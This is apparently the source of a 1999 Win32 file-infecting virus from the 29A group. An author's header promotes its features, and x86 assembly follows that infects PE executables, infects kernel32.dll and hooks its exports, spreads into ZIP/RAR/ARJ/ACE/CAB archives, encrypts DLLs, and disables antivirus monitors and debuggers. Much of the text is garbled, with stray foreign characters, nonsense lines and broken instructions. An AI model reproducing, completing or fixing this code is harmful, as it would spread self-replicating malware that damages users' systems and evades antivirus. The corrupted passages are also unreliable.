;
Where is 谀 谀 屯 屯 哪 哪 哪 哪 哪 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯; 屯 屯 屯 屯 屯 屯;;;;;;;; 29A:
Where is the 睦 耐 屯 睦 睦 哪 哪 哪 哪 馁 馁 馁 屯 屯 屯 屯 屯 馁 馁 睦 睦 睦 睦 睦 睦 馁
I'm Very Proud on My Very First Virus At Win32 Platform. IT INFECTS EXE
Files with PE (Portable Executable) Header. Also IT CAN Compress Itself
; INTO ZIP / ARJ / RAR / ACE / CAB Archivez. if The Virus Catch DLL OPEATIONS, IT
ENCRYPT / DECRYPT THAT BY CRYPTOGRAPHY FUNCTIONS. Thus, We can PRONOUNCE
The System Is Dependents on The Virus (Onehalf Idea).
;
; INFECTED EX IS Started, IT INFECTS KERNEL32.DLL, HOOKS SOME WIN32
Functions and next reboot is actived. it catches "all" file operations,
Create Thread / Mutex, Run Hyper Infection for API to Find Archivez, AV
Checksum Files, EXES AND SO ON.
;
; If PHI-API WILL FIND AN Archive Program, The Virus Compress itself and
add itself to body (inside, not at the end). My PPE-II Does Not Support
Copro & MMX Garbages, Only Based with Many Features Are New.
;
;
Detailed Information
Where is Xiyomo know? Where is it?
;
;
Cryptography Area, Based On WinAPI (SR2 / NT) Functions
Where is Xomomo know 1y? Where is Xomomo know and know? Where is Xiyo ?; Let us Start. I Exploited One Half Technics for Win32 World, New Method
In Our vx World. You Exactly Know One Half Tries To Encode Your Sectory
And if you want to read its he decodes Ones and so on, you exactly know
What I think. Well, And Because I use kernel32 infection i can hook all
File functions. Then i decode all DLL Files by PHI-II (Hyper Infection)
And if the system towns to open dll file i decode one, and so on..
The Win32 System Is Dependents On My Virus. Naturally, The User Can Re-
; Install Win95 / 98 / NT / 2000 But Then DLL Are in Msoffice, Visual C , ICQ,
Outlook, AutoCad and Many Many More Appz. For Comparison: My Win98 HAS; 831 DLL Files and ON My All Disks Are 5103 DLL Files (Including Win2k).
I know this is the perfect way to get all what you want. But i've found
; Out i can't hook all Win32 File Operations So, True Crypto DLL WILL BE
; Inside Ring0 / Ring3 World - My FUTURE WORK ...
;
;
PRIZZY POLYMORPHIC ENGINE (PPE-II New Version)
Where is Xiyomy? Where is Xomomo know? Where is Xiyomo?
I've Removed All Copro & MMX Garbages and I've Coded these New Stuff:
; * Brute-attact algorithm
; * Random Multi-layer engine
; By "brute-attic" I'm Finding Right Code Value by Checksum. And Because
I don't know what number, av neither. This process can take Mostly 0.82
Seconds on my p233. for more info find "PPE_Brute_init:" in this Source
;
In the second case I don't decode by default (up to down) But by random
Multi-layer algorithm. It means I generate the certificate buffer and by
ITS I Decode Up or Down. thus i can generate More 950 Layers and
Typical Some 69 Layers. Also The Random Buffer, Behind Poly Loop, HAS
Anti-Heuristic Protection (Gaps) To av couldn't Simulate That Process.
.................
Find "PPE_MLAYER_GENERATE:" Label for Momre Information.
;
;
Infection Zip / Archivez, Including Rar / Ace EXE-SFX
Where is Xiyomo knows and know and know and know and know? Where is Xiyomy? Where is Xiyo?
FECTED File By Random Compression Level. The Dropper is stored in-
Side Archive, Not at the end. so, i don't need it................
HOWEVER SESE OPERATIONS Are Very Complex, Especial Zip Infection But; IT ISN't Impossible. So, AV Cannot Check Only Last File (Stored) IN AR-
Chive, But INSIDE IT.
;
;
Main Features
Where is Xiyuomi?
;
; * Platforms: Windows 95/98, Windows NT / 2000 (TESTED ON 2031 Build)
; * Residency: Yes, kernel32 Way, Working on 95/98 and NT / 2K Systems
; * Non-Residency: Yes, ONLY K32 Infection
; * Stealth: Yes, DLLS WORKING; OPENING, COPYING AND Loading
; * Antidebugging: Yes, Some Stupid Debuggers Like Td32; Routinues for
DISABLE SOFTICE 95 / NT.
; * Antiheuristic: Yes, Threads Way and multi-layer anti-heuristic
; * Antiantivirus: Yes, Deleting Checksum Files, Hacking Avast Database
; * Other Anti- *: Yes, Anti-Emulator, Anti-Bait, Anti-Monitor
; * Fast Infection: Yes / No, Infect Only 20 EXES EVERY Reboot, But Infect
; All Types of Archivez on All Diskz
; * Polymomrphism: Yes, Using Based Garbages from Win9x.prizzy, Inclu
Ding Brute-force Way and Random Multi-Layer Way
; * Other Features: (a) Use of brute-crc64 algorithm to find APIN K32
; (b) Encoding and decoding DLLS in Real Time
(c) Memory Allocations by "CreateFilemapping" FUNC.
'Cause of Sharing Among Processes
; (d) Use of threads, Mutexes & Process Tricks
; (e) support of "do not infected" TABLE
(f) Checking Files by Natural Logarithm
; (g) No Optimalization, Yeah, I don't lie (Read
"Words from Prizzy" 29A # 4 to know why)
; (h) Unicode Support
;
;
Greetings
Where is it?
And finally my greetz go to:
Where is Xiyomo know? Where is Xun?
; Darkman U'Re Really Great Inet Pal, Thanx for Fun On #Virus :)
Benny Thanx for Big Help with Threads, Mutexes ... We're Wait-
; ing for darkman's trip here, aren't we :)?; Griyo Nah, I'd like to understand Your Ideas ... Thanx :)!
Flush U'VE Really Big Anti- * Ideas, Dude
MemoryLapse Yeah, K32 Infection ... Go Out of EFNET TO Undernet
Lordjulus you have great vx articles, viruses ...
; Asmodeus Finish That Virus and Release It; Thanx for your trust
; Av companies Just Where is my win9x.prizzy description :)?
; ... and for virusbuster and bumblebee
;
;
Contact ME
Where is it?
PRIZZY@coderz.net
; http://prizzy.cjb.net
;
;
; (c) Oded by Prizzy / 29A, December 1999
;
;
.386P
.Model flat, stdcall
INCLUDE INCLUDE / WIN32API.INC
INCLUDE INCLUDE / USEFUL.INC
INCLUDE INCLUDE / MZ.INC
INCLUDE INCLUDE / PE.INC
EXTRN EXITPROCESS: PROC
EXTRN Messageboxa: Proc
Where is the thumb be a beautiful to program Start? Where is Xomiyo? Where is Xiyomo?
.DATA
DB?
.code
Which of the Virus is needed by virus? Which of the Virus is nervus?
Debug Equ Yez; ONLY for Debug and 1st Start
MEM_SIZE EQU (MEM_END -VIRUS_START); SIZE OF VIRUS IN MEMORY
FILE_SIZE EQU (file_end-virus_start); Size of Virus In File
Infect_minsize EQU 4096; ONLY FILEZ BIGGER THEN 4K
Infect_MaxSize EQU 100 * 1024 * 1024; To 100MB
Access_ebx EQU (DWORD PTR 16); Access Into Stack When
Access_edx EQU (DWORD PTR 20); Will BE Used Pushad
Access_ecx EQU (DWORD PTR 24)
Access_eax EQU (DWORD PTR 28)
Search_mem_size EQU 100 * (Size DTA SIZE Search_address)
What is the thumb some structurez for Virus? Where is Xomo know? Where is Xiyomo?
DTA_STRUC STRUC; WIN32_FIND_DATA STRUCTURE
DTA_FILEATTR DD?; for FindfirstFile function
DTA_TIME_CREATION DQ?
DTA_TIME_LASTACCESS DQ?
DTA_TIME_LASTWRITE DQ?
DTA_FILESIZE_HI DD?
DTA_FILESIZE DD?
DTA_RESERVED_0 DD?
DTA_RESERVED_1 DD?
DTA_FILENAME DB 260 DUP (?)
DTA_FILENAME_SHORT DB 14 DUP (?) Ends
Systime_struc structure; used by my windows API
Wyear DW 0000h; "Hyper Infection"
WMONTH DW 0000H
WDAYOFWEEK DW 0000H
WDAY DW 0000h
WHOR DW 0000H
Wminute dw 0000h
WSECOND DW 0000H
WmilliseConds DW 0000h
ENDS
Process_information struc; createProcess: struct # 1
HProcess DD 00000000H
HThread DD 0000000000h
DWProcessid DD 00000000H
DWTHREADID DD 00000000H
ENDS
Startup_info struc; CreateProcess: Struc # 2
CB DD 00000000H
LPRESERVED DD 0000000000H; this Struc Has Been Stolen
LPDESKTOP DD 00000000H; from "Win32 Help"
LPTITLE DD 00000000H
DWX DD 00000000H
DWY DD 00000000H
DWXSIZE DD 00000000H
Dwysize DD 00000000H
DWXCountChars DD 00000000H
DWYCOUNTCHARS DD 00000000H
DWFillattribute DD 00000000H
DWFLAGS DD 00000000H
WshowWindow dw 0000h
CBRESERVED2 DW 0000H
LPRESERVED2 DD 00000000H
HSTDINPUT DD 00000000H
HSTDOUTPUT DD 00000000H
HSTDERROR DD 00000000H
ENDS
File_time struc; Get / set file time struc
DwlowDateTime DD 00000000H
DWHighDateTime DD 00000000H
ENDS
What is the thumb some macroz needed by virus? Where is Xombe? Where is Xiyomo?
Search "Anti-Emulators:" for more information
@ANTI_E_START MACRO START_HACK, FINISH_HACK
While (Num Ne 0)
Push DWORD PTR [EBP START_HACK / /
(Finish_hack-start_hack / 4 1 - num) * 4]
Num = NUM - 1
ENDM
Num = (finish_hack - start_hack) / 4 1
ENDM
@ANTI_E_FINISH Macro Start_Hack, Finish_Hack, Thread_Handle
While (Num Ne 0)
POP DWORD PTR [EBP FINISH_HACK - /
(Finish_hack-start_hack) MOD 4 - /
(Finish_hack-start_hack / 4 1 - num) * 4]
Num = NUM - 1
ENDM
Call [EBP DDCLOSEHANDLE], Thread_Handle
Num = (finish_hack - start_hack) / 4 1
ENDM
Where is the Virus Code Starts Here? Where is Xomiyo knowing is Xomiyo? Where is the Virus_Start: Call Get_base_EBP; Get Actual Address to EBP
MOV EAX, EBP
DB 2DH; SUB Eax, Infected_ep
Infected_ep: DD 00001000H
DB 05H; Add Eax, Original_EP
Original_ep: DD 00000000
Sub eAX, [EBP __ PLLG_LSIZE]
Push Eax; Host Address
Use anti-emulator
Pusha
@Seh_setupframe
Call $; ehm :)
JMP __RETURN
__ANTI_E_1:
@Seh_removeframe; reset seh handler
POPA
Call Find_kernel32; Find Kernel's Base Address
Use anti-emulator
@ANTI_E_START __THREAD_1_BEGIN, __THREAD_1_FINISH
Lea Eax, [EBP __ threeRead_1]; Thread Function
MOV EBX, OFFSET __THREAD_1_BEGIN /
(__thread_1_finish - __thread_1_begin) /
SHL 18H; Upper Imm8 Register in EBX
Call __mycreatethread; * Anti-Heuristic
__thread_1_begin EQU this BYTE
JMP $; anti-emulator :)
JMP __RETURN; PATCH THIS! RANDOM NUMBER
__thread_1_finish equ this byte
@ANTI_E_FINISH __THREAD_1_BEGIN, __THREAD_1_FINISH, EAX
Next Code ...
Call Kill_AV_Monitors; Kill Avp, Avast32 ETC.
Call Kill_Debuggers; Bye, Bye Softice, My Honey
CALL CREATE_MUTEX; ALREADY RESIDENT?
JC __RETURN; Go Back, IF YES
Call Crypto_Startup
Call infect_kernel; ehm, find kernel and infect!
__Return:
POP EAX
Add Eax, Offset Virus_Start
JMP EAX; Go Back, My Lord ...
What is the MAIN FUNCTION for Infect File? Where is Xombey? Where is Xiyomo?
; ------------------------------------------------- ------------
This is main function which infects file.
;
Extension Support:
EX ... EXECUTABLE FILE (PE), RAR / ACE SFX File
; DLL ... kernel32 infection, Encypting THROUGH PHI-API
Cab ... Infecting Microsoft Cabinet File
Zip / Arj / Rar / Ace ... Dropper Compressed, Inside Archive
;
Okay, Here Is Truth. I Had Many Problems with Exe and DLL; Infection In this function. I Found Out All Valuez Have
To be aligned etc. especially win2k ued That. I Also Use
"ChecksumMappedFile" function to calculate appz checksum.
;
Infect_file:
; Save Registers & Get Delta
Pusha
CALL GET_BASE_EBP
Get Extension
MOV EDI, [EBP FileName_ptr]
Convert LowerCase Characters to Uppercase
Push EDI
Call [EBP DDLSTRLEN]; Get Length of FileName
Inc Eax; Number of Characters To
Push Eax; Progress
Push EDI; FileName
Call [EBP DDCHARUPPERBUFFA]; Convert to Uppercase
; Infect Only Files in There Dirz
IFDEF Debug
CMP [EDI 00000000H], 'W /: C'; "C: / Win / WEWB4 / XX /"
JNZ __IF_DEBUG; Directory
CMP [EDI 00000004H], 'W / Ni'
JNZ __IF_DEBUG
CMP [EDI 00000008H], '4bwe'
JNZ __IF_DEBUG
CMP [EDI 0000000Ch], '/ xx /'
JZ __IF_DEBUG2
__IF_DEBUG:
CMP [EDI], 'W /: C'; "c: / windows / kern"
JNZ Infect_file_exit
CMP [EDI 4], 'Odni'
JNZ Infect_file_exit
CMP [EDI 8], 'K / SW'
JNZ Infect_file_exit
CMP [EDI 8 4], 'Enre'
JNZ Infect_file_exit
__IF_DEBUG2:
ENDIF
Check File Name (by avoid table)
MOV EBX, [EBP FileName_ptr]; FileName
Lea ESI, [EBP AVOID_TABLE]; Avoid Table
Call validate_name
JC infect_file_exit
Check av files (Anti-Bait)
Call fuck_av_files
JC infect_file_exit
Get Extension
CLD
MOV Al, '.'; search this char
MOV CX, FileName_Size; Max filename_size
Repunz scaSB; searching ...
Dec Edi; Set to That Char
CMP Al, [EDI]; Check Again!
JNZ infect_file_exit; shit, bad last char
IFDEF Debug
MOV EAX, [EDI-4]; You Can Infect ONLY
CMP EAX, '23LE'
JZ __ONLYMYKERNEL
CMP EAX, 'DCBA'; this file on my diskjnz infect_file_exit; I Won't risk
__ONLYMYKERNEL:
ENDIF
Get File Information
Lea ESI, [EBP DTA]; DTA Structure
MOV EDX, [EBP FileName_ptr]; FileName Pointer
Call __myfindfirst
JC infect_file_exit; service?
Call __myfindclose; Close Handle
CMP DWORD PTR [EBP IT_IS_KERNEL], 00000001H
JZ infect_file_continue; if kernel32, infect it
Check Extension
MOV EX, [EDI]; Get Ext Of File
NOT EAX
CMP EAX, NOT 'EXE.'; Is IT EXE FILE?
JNZ next_ext_1
Call infect_ace_rar; is IT ACE / RAR EXE-SFX File?
JNC Infect_file_exit
JMP next_ext_end
NEXT_EXT_1:
CMP EAX, NOT 'ECA.'; Is IT ACHIVE FILE?
JNZ next_ext_2
Call infect_ace
NEXT_EXT_2:
CMP EAX, NOT 'RAR.'; Is IT RAR Archive File?
JNZ next_ext_3
Call infect_rar
NEXT_EXT_3:
CMP EAX, NOT 'JRA.'; Is IT ARJ Archive File?
JNZ next_ext_4
Call infect_arj
NEXT_EXT_4:
CMP EAX, NOT 'PIZ.'; Is IT ZIP Archive File?
JNZ next_ext_5
Call infect_zip
NEXT_EXT_5:
CMP EAX, NOT 'BAC.'; Is IT Cab Archive File?
JNZ Infect_file_exit
Call infect_cab
JMP infect_file_exit
NEXT_EXT_END:; Infect IF ANY EXE FILE
Check Number of Infected Files
CMP [EBP NEWACE.DROPPER], 00000000H
JZ Infect_File_Continue; Dropper EXISTS?
CMP DWORD PTR [EBP File_INFECTED], 20
JAE INFECT_FILE_EXIT; Infected More Ten EXES?
Check File Size
INFECT_FILE_CONTINUE:
MOV EAX, [EBP DTA.DTA_FILESIZE]
CMP EAX, INFECT_MINSIZE; IS FileSize Smaller?
JB infect_file_exit
CMP EAX, INFECT_MAXSIZE; Is FileSize Bigger?
Ja infect_file_exit
Set file attributes
MOV ECX, File_Attribute_normal
MOV EDX, [EBP FileName_ptr]
Call __mysetttrfile
JC infect_file_exit; service?
Open filemov Edx, [EBP FileName_ptr]
Call __myopenfile; open file!
JC Infect_file_Restattr
MOV [EBP FILE_HANDLE], EAX
CREATE A MEMORY MAP OBJECT
Push 00000000H; Name of File Mapping Object
Push 00000000H; Low 32 Bits of Object Size
Push 00000000H; High 32 Bits of Object Size
Push Page_readonly; Get Needed Valuez, ETC.
Push 00000000H; Optional Security Attributes
Push [EBP FILE_HANDLE]; Handle to File To Map
Call [EBP DDCREATEFILEMAPPINGA]
OR EAX, EAX; FAILED?
JZ infect_file_close
MOV [EBP File_HMAP], EAX; Store Mapped File Handle
View of File IN Our Address
Push 00000000H; Number of Bytes To Map
Push 00000000H; Low 32 bits of the offset
Push 00000000H; High 32 Bits of the Offset
Push file_map_read; Access Mode
Push [EBP File_HMAP]; mapped file handle
Call [EBP DDMAPVIEWOFFILE]
OR EAX, EAX; FAILED?
JZ infect_file_closemap
MOV [EBP File_HMEM], EAX; Mapped File In Memory
Check File Signature
CMP Word PTR [Eax.mz_magic], /
Image_dos_signature; test 'mz'
JNZ Infect_File_Unmap
Check "PE" Valuez
CMP Word PTR [Eax.mz_Crlc], 0000H
JZ infect_file_okay; no pe?
CMP Word PTR [Eax.mz_Lfarlc], 0040H
JB infect_file_unmap; bad pe?
Infect_file_okay:
Seek on NT Header
Mov ESI, EAX
Add esi, [eax.mz_lfanew]
PUSH ESI
Call [EBP DDISBADCODEPTR]; Can We Read Memory At Least?
OR EAX, EAX
JNZ Infect_File_Unmap
Check "PE" SIGNATURE
CMP DWORD PTR [ESI.NT_SIGNATURE], /
Image_nt_signature
JNZ Infect_file_unmap; Is IT Really 'PE / 0/0'?
? Already Infected?
MOV EAX, [EBP File_HMEM]; mapped file in memory
Add Eax, [EBP DTA.DTA_FILESIZE]
MOV EAX, [EAX-00000004h]; Infected DWORD FLAG
Call __check_infected
JNC Infect_File_Unmap
Check Header Flags
MOV AX, [ESI NT_FILEHEADER.FH_CHARACTERISTICS]]
Test AX, Image_File_Executable_Image
JZ Infect_File_Unmap
TEST AX, Image_FILE_DLL; NO DLL?
JZ infect_file_no_dll
CMP DWORD PTR [EBP IT_IS_KERNEL], 00000000H
JZ infect_file_unmap; Is IT Kernel32 Infection?
INFECT_FILE_NO_DLL:
Call __getlastObjectTable; Seek On Last Object Table
; Alloc Memory for Polymorphic ENGINE
Mov Eax, File_Size 30000h
Call malloc
MOV [EBP MEM_ADDRESS], EAX
Add Eax, File_Size
MOV [EBP POLY_START], EAX
Get New Entry-Point (EXE), or CHANGE IT OF KERNEL32?
MOV EAX, [EBX Sh_SIZEOFRAWDATA]
Add Eax, [EBX SH_VIRTUALADDRESS]
MOV DWORD PTR [EBP Infected_ep], EAX
MOV EAX, [ESI NT_OPTIONALHEADER.OH_ADDRESSOFENTRYPOINT]
MOV DWORD PTR [EBP Original_EP], EAX
MOV [EBP POLY_FINISH], MEM_SIZE
Run PRIZZY POLYMORPHIC ENGINE (PPE-II)
CMP DWORD PTR [EBP IT_IS_KERNEL], 00000000H
Jnz infect_file_common
Call PPE_STARTUP
Calculate Maximum Infected File Size
Infect_file_common:
MOV EAX, [EBX Sh_SIZEOFRAWDATA]; File Size
Add Eax, [EBX SH_POINTERTORAWDATA]
Add Eax, [EBP POLY_FINISH]; Virus File Size
Add Eax, 00000004h; Infected Flag
MOV ECX, [ESI NT_OPTIONALHEADER.OH_FILALIGNMENT]
XOR EDX, EDX
Add Eax, ECX
Dec EAX
Div ECX
Mul ECX
Push EAX
Unmap file object
Push [EBP File_HMEM]
Call [EBP DDUNMAPVIEWOFFILE]
; Close Mapping File Object
Push [EBP File_HMAP]
Call [EBP DDCLOSEHANDLE]
; Reopen Memory Mapped File Object
Push 00000000H; Name of File Mapping Object
Push DWORD PTR [ESP 0000004h]; LOW 32 BITS OF Object Size
Push 00000000H; High 32 Bits of Object Size
Push Page_readwrite; Get Needed Valuez, ETC.
Push 00000000H; Optional Security AttributeSpush [EBP FILE_HANDLE]; Handle to File To Map
Call [EBP DDCREATEFILEMAPPINGA]
MOV [EBP File_HMAP], EAX; Store Mapped File Handle
View of File IN Our Memory
Push 00000000H; Number of Bytes To Map
Push 00000000H; Low 32 bits of the offset
Push 00000000H; High 32 Bits of the Offset
Push file_map_write; Access Mode
Push [EBP File_HMAP]; mapped file handle
Call [EBP DDMAPVIEWOFFILE]
MOV [EBP File_HMEM], EAX; Mapped File In Memory
Seek on Last Object Table
Add eax, [eax.mz_lfanew]
Mov ESI, EAX
Call __getlastObjectTable
Infect "kernel32" File or change Entrypoint
CMP DWORD PTR [EBP IT_IS_KERNEL], 00000000H
JZ Infect_File_ENTRY
MOV [EBP __ PLLG_LSIZE], 00000000H; More Info In That Func
Call infect_file_kernel; hook "kernel32" Table :)
JMP infect_file_no_change
INFECT_FILE_ENTRY:
MOV EAX, DWORD PTR [EBP Infected_ep]
Add Eax, [EBP File_Size3]
MOV [ESI NT_OPTIONALHEADER.OH_ADDRESSOFENTRYPOINT], EAX
Copy MEM_ADDRESS (Virus Body) To the end of file
INFECT_FILE_NO_CHANGE:
PUSH ESI
MOV ESI, [EBP MEM_ADDRESS]; Source Data
Mov EDI, [EBX Sh_SIZEOFRAWDATA]
Add Edi, [EBX SH_POINTERTORAWDATA]
Add Edi, [EBP File_HMEM]; Destination Pointer
MOV ECX, [EBP POLY_FINISH]; Number of Bytes To Copy
REP MOVSB
POP ESI
Calculate New Physical Size
MOV EAX, [EBP POLY_FINISH]
CMP DWORD PTR [EBP IT_IS_KERNEL], 00000000H
JZ $ 7; this isn't Logic But I Had
MOV Eax, Mem_Size; Problems In K32 Memory
Add Eax, [EBX Sh_SIZEOFRAWDATA]
MOV ECX, [ESI NT_OPTIONALHEADER.OH_FILALIGNMENT]
XOR EDX, EDX
Add Eax, ECX
Dec EAX
Div ECX
Mul ECX
MOV [EBX Sh_SIZEOFRAWDATA], EAX
Calculate New Potential Virtual Sizemov Eax, [EBX Sh_VIRTUALSIZE]
Add Eax, MEM_SIZE
MOV ECX, [ESI NT_OPTIONALHEADER.OH_SECTIONALIGNMENT]
XOR EDX, EDX
Add Eax, ECX
Dec EAX
Div ECX
Mul ECX
; if new phys_size> virt_size ==> virt_size = phys_size
CMP EAX, [EBX Sh_SIZEOFRAWDATA]
JNC infect_file_no_update
MOV EAX, [EBX Sh_SIZEOFRAWDATA]
INFECT_FILE_NO_UPDATE:
MOV [EBX SH_VIRTUALSIZE], EAX
Add Eax, [EBX SH_VIRTUALADDRESS]
Infected Host IncreaSed An Image Size?
CMP Eax, [ESI NT_OPTIONALHEADER.OH_SIZEOFIMAGE]
JC infect_no_update_2
MOV [ESI NT_OPTIONALHEADER.OH_SIZEOFIMAGE], EAX
INFECT_NO_UPDATE_2:
Set these PE FLAGS
OR DWORD PTR [EBX Sh_Characteristics], /
Image_scn_cnt_code or image_scn_mem_execute or /
Image_scn_mem_write
Already Infected Flag
Mov Eax, 02302301H; Special Number
Call PPE_GET_RND_RANGE
INC EAX; IT CAN't Be Zero
Imul Eax, 117; Encrypt One
POP EDI; File Size Virus Size
MOV [EBP FILE_HSIZE], EDI
Add Edi, [EBP File_HMEM]; Mapped File In Memory
MOV [EDI-00000004H], EAX; Already Infected Flag
; Calculate New Checksum Because of Win2k and Winnt :)
CMP DWORD PTR [ESI NT_OPTIONALHEADER. /
Oh_Checksum], 00000000H
JZ infect_file_no_checksum
@pushsz "imagehlp.dll"; load "imagehlp.dll" Library
Call [EBP DDLOADLIBRARYA]
OR EAX, EAX; FAILED?
JZ infect_file_no_checksum
Push Eax; Parameter for Freelibrary
Get Function To Calculate Checksum
@Pushsz "ChecksummappedFile"; Get Address of this function
Push Eax; Library Handle
Call [EBP DDGETPROCADDRESS]
OR EAX, EAX
JZ infect_file_deload
Calculate Checksum
Lea ECX, [ESI NT_OPTIONALHEADER.OH_CHECKSUM]
PUSH ECX; Receives Computed ChecksumCall $ 9; Header Old Checksum
DD?
Push DWORD PTR [EBP FILE_HSIZE]
Push [EBP File_hmem]; Memory Mapped Address
Call EAX
INFECT_FILE_DELOAD:
Call [EBP DDFREELIBRARY]
; DEAALLOC MEMORY for PPE-II
INFECT_FILE_NO_CHECKSUM:
MOV EAX, [EBP MEM_ADDRESS]
Call Mdealloc
New infected file
INC DWORD PTR [EBP File_INFECTED]
Use of use for acrhive dropper?
CMP DWORD PTR [EBP DTA.DTA_FILESIZE], 30000
Ja infect_file_unmap; for archive fsize <30kb
Push [EBP File_hmem]; Mapped File in Memory
Call [EBP DDUNMAPVIEWOFFILE]
Push [EBP File_HMAP]; mapped file object
Call [EBP DDCLOSEHANDLE]
MOV EBX, [EBP FILE_HANDLE]; I Must Close Infected File
Call __myclosefile; Coz I'll Copy IT, ETCETERA
Call __add_dropper; Compress IT by Zip, Rar ...
JMP Infect_File_Restattr
INFECT_FILE_UNMAP:
Push [EBP File_hmem]; Mapped File in Memory
Call [EBP DDUNMAPVIEWOFFILE]
Infect_file_closemap:
Push [EBP File_HMAP]; mapped file object
Call [EBP DDCLOSEHANDLE]
INFECT_FILE_TIME:
Lea EAX, [EBP DTA.DTA_TIME_LASTWRITE]
Lea ECX, [EBP DTA.DTA_TIME_LASTACCESS]
Lea Edx, [EBP DTA.DTA_TIME_CREATION]
Call [EBP DDSETFILETIME], /
[EBP FILE_HANDLE], /
EDX, ECX, EAX
Infect_file_close:
MOV EBX, [EBP File_Handle]; Close File Handle
Call __myclosefile
INFECT_FILE_RESTATTR:
MOV ECX, [EBP DTA.DTA_FILEATTR]
MOV EDX, [EBP FileName_ptr]; Restore File Attributes
Call __mysetttrfile
INFECT_FILE_EXIT:
POPA; Go to Hyperinfection Or To
Ret; kernel32 hooked functions
; ------------------------------------------------- ------------
Common file infreaded semi-functions.
;
__getlastObjectTable:
Movzx Eax, [ESI NT_FILEHEADER.FH_NUMBEROFSECTIONS] CDQ
MOV ECX, Image_SizeOf_SECTION_HEADER
Dec EAX
Mul ECX; EAX = OFFS of Last Section
Movzx EDX, [ESI NT_FILEHEADER.FH_SIZEOFOPTIONALHEADER]
Add Eax, EDX
Add Eax, ESI
Add Eax, Offset NT_OptionalHeader.oh_magic; Seek to L.O. Table
XCHG EAX, EBX
RET
; Which thumb function to hook Some Funtions from kernel32.dll?
; ------------------------------------------------- ------------
At last I've finish this unpalatable function. I Remem-
Ber How hardly I Have Found An Interesting Source About
This Method Because I Have Many Many Problems with this.
; SO, Let's begin. At First I Will Get these Addresses:
; * name Table Pointer (AS Are Function Names)
; * Address Table Pointer (AS Are Functions Addresses)
* Ordinal Table Pointer
Imate Name, Calculate ITS CRC32 and I'LL
Compare it with my future-hooked crc32 table. if i will
; Find IT, I Will Save Its Original Address, Replace By My
My New Offset and I'll Write It To The File.
;
I Would Like to Thank:
; * "Memory Lapse" for His "Win32.Heretic" SOURCE
; * DARKMAN / 29A for Giving Me That Source
;
I Must Infect "kernel32.dll" Because I Must Hook All Disk
Functions Because of "Prizzy Hyper Infection for API".
;
Infect_file_kernel:
; Save All Registers
Pusha
Check Address of Apis in kernel32 File Body
Mov Eax, [EBP File_HMEM]
Add eax, [eax.mz_lfanew]; Go to New "PE" Header
MOV Eax, DWORD PTR [Eax.OH_DirectoryEntries /
Image_sizeof_file_header /
00000004h]; Get Export Directory Table
Add Eax, [EBP File_HMEM]
MOV EBX, [Eax.ed_addressofordinals]
Mov esi, [eax.ed_addressofnames]]
Mov edx, [eax.ed_addressoffunctions] push [eax.ed_baseordinal]; save baseordinal
Add eax, [eax.ed_baseordinal]
Add EBX, [EBP File_HMEM]; Adjust Ordinal Table Pointer
Add ESI, [EBP File_HMEM]; Adjust Name Table Pointer
Add Edx, [EBP File_HMEM]; Adjust Address Table Pointer
Push Edx ESI EBX; Save Startup Values
Main Loop
Lea EDI, [EBP HOOKED_API]
MOV ECX, 00000001H
__IFK_NEXT_LOOP:
Push Edx; Address Table Pointer
Push Ecx; Save Counter
SHL ECX, 01H; Convert to Word INDEX
Movzx Eax, Word PTR [EBX ECX]; Calculate Ordinal Index
Sub Eax, [ESP 00000014H]; Relative to Ordinal Basee
SHL EAX, 02H; Convert to DWORD INDEX
Mov Edx, EAX
MOV ECX, [ESP 00000010h]; Address Pointer Table
Add Eax, Ecx; Calculate Offset
LEA ECX, [ECX EDX]; RVA of API
Push ESI; Address Name Table
MOV ESI, [ESI]; Get Pointer from name TABLE
Add ESI, [EBP File_HMEM]
Call __get_crc32; get crc32 for function name
CMP Eax, [EDI]; Compare CRC32
POP ESI
JNZ __IFK_NOT_FOND
Push EDI; Load Original Function Addr
Lea Eax, [EBP HOOKED_API]
Sub EDI, EAX
SHL EDI, 01H; SO, (X / 2) * 8
Lea Eax, [EBP HOOKED_API_FUNCTION]
Add Edi, EAX
MOV EAX, [EDI]; Get Address INTO "JMP ????"
Add Eax, EBP; EHM, Adjust That Address
MOV EBX, [ECX]; Load Original Address
Add EBX, [EBP KERNEL_BASE]
MOV [EAX], EBX; Save Original Func. Address
MOV Eax, [EDI 00000004h]; Load New Address in v.body
POP EDI
Add EDI, 00000004H; Next CRC32 Function Value
Sub eax, offset virus_start; - "offset"
Add Eax, [EBP DTA.DTA_FILESIZE]; New Func. Pos in "K32"
MOV [ECX], EAX
For Next Loop I Must Restart There Values
MOV EBX, [ESP 00000008H]; Load Ordinal Table Pointer
MOV ESI, [ESP 0000000CH]; load name Table Pointermov Edx, [ESP 00000010H]; Load Address Table Pointer
Mov DWORD PTR [ESP], 00000000H; Reset Counter
MOV [ESP 00000004H], EDX; Reset Address Table Pointer
JMP __IFK_NO_CHANGE; this Was Fucking Bug!
__IFK_NOT_FOND:
Add ESI, 00000004h; Next Name Pointer
Add DWORD PTR [ESP /; Next Function POINTER
00000004H], 00000004H
__IFK_NO_CHANGE:
POP ECX; Functions Counter
Inc ECX; Next Function
POP EDX; Address Table Pointer
CMP DWORD PTR [EDI], 00000000H; End Of HOOKED FUNCTIONS?
JNZ __IFK_NEXT_LOOP
MOV DWORD PTR [EBP IT_IS_KERNEL], 00000000H
MOV DWORD PTR [EBP HYPERINFECTION_K32], 00000000H
Write this Virus body to the end of "kernel32.dll"
Virus body cannot be encrypted ...
Lea ESI, [EBP VIRUS_START]; Start of Virus Body
MOV EDI, [EBP MEM_ADDRESS]; Allocated Memory
MOV ECX, MEM_SIZE
REP MOVSB
MOV DWORD PTR [EBP IT_IS_KERNEL], 00000001H
MOV EAX, MEM_SIZE; WITHOUT POLY-ENGINE !!!
MOV [EBP POLY_FINISH], EAX
Add ESP, 4 * 4
POPA
Ret; Complex Way How To Go Back
Which of the thumb mother function of infect All Filez on Disks? Where is Xiyen?
; ------------------------------------------------- ------------
This Function Searchs these Extensions on all disks:
; EX, ZIP, ARJ, RAR, ACE, CAB, ...
And Many Namez, Find "Hypertable" struct for more info.
; If you want to know more about this method, Open "Hyper
; Infection "Article In 29a # 4, or Download One from My Web
;
Note: * this is version for API, for IDt Orientation USE
Code from "Win95.prizzy", thanks.
;
Init_Search:
Pusha
Call get_base_ebp; Where we're Into EBP
MOV EBX, [EBP Search_Table]; Position in Hypertable
CMP BYTE PTR [EBP Search_Start], 00H
JNZ __CONTINUE
MOV BYTE PTR [EBP Search_Start], 01H
Call get_disks; get drive parameters
Lea EAX, [EBP TIME]
Push EAX
